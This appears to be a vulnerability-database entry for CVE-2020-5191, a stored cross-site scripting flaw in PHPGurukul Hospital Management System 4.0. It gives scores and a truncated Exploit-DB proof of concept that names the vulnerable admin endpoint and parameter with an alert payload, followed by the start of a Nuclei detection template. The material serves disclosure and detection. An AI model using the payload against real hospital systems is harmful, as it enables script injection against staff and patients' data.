CVE-2020-5191
published 2020-01-06
CVE-2020-5191: PHPGurukul Hospital Management System in PHP v4.0 suffers from multiple Persistent XSS vulnerabilities.
Priority P339 · medium · 6.1 (CVSS 3.1)
AV:N / AC:L / PR:N / UI:R / S:C / C:L / I:L / A:N
EXPLOIT
EPSS: 5.52% (91.8th percentile)
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| phpgurukul | hospital_management_system | — | — |
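CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 6.1 | MEDIUM | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N |
| nvd | v2.0 | 4.3 | MEDIUM | AV:N/AC:M/Au:N/C:N/I:P/A:N |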
No detection rules found.
Exploit-DB
Hospital Management System 4.0 - Persistent Cross-Site Scripting
exploitdb·2020-01-02·CVSS 6.1
CVE-2020-5191 [MEDIUM] Hospital Management System 4.0 - Persistent Cross-Site Scripting
---
# Exploit Title: Hospital Management System 4.0 - Persistent Cross-Site Scripting
# Google Dork: N/A
# Date: 2020-01-02
# Exploit Author: FULLSHADE
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/hospital-management-system-in-php/
# Version: v4.0
# Tested on: Windows
# CVE : CVE-2020-5191
================ 1. - Cross Site Scripting (Persistent) ================
URL : http://10.0.0.214/hospital/hospital/hms/admin/doctor-specilization.php
Method : POST
Parameter: doctorspecilization
Attack : alert("XSS");
POST /hospital/hospital/hms/admin/doctor-specilization.php HTTP/1.1
Host: 10.0.0.214
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: t
Nuclei
PHPGurukul Hospital Management System - Cross-Site Scripting
nuclei·CVSS 6.1
CVE-2020-5191 [MEDIUM] PHPGurukul Hospital Management System - Cross-Site Scripting
PHPGurukul Hospital Management System in PHP 4.0 contains multiple cross-site scripting vulnerabilities. An attacker can execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.
Template:
id: CVE-2020-5191

info:
  name: PHPGurukul Hospital Management System - Cross-Site Scripting
  author: TenBird
  severity: medium
  description: |
    PHPGurukul Hospital Management System in PHP 4.0 contains multiple cross-site scripting vulnerabilities. An attacker can execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by
No writeups or analysis indexed.
Published: 2020-01-06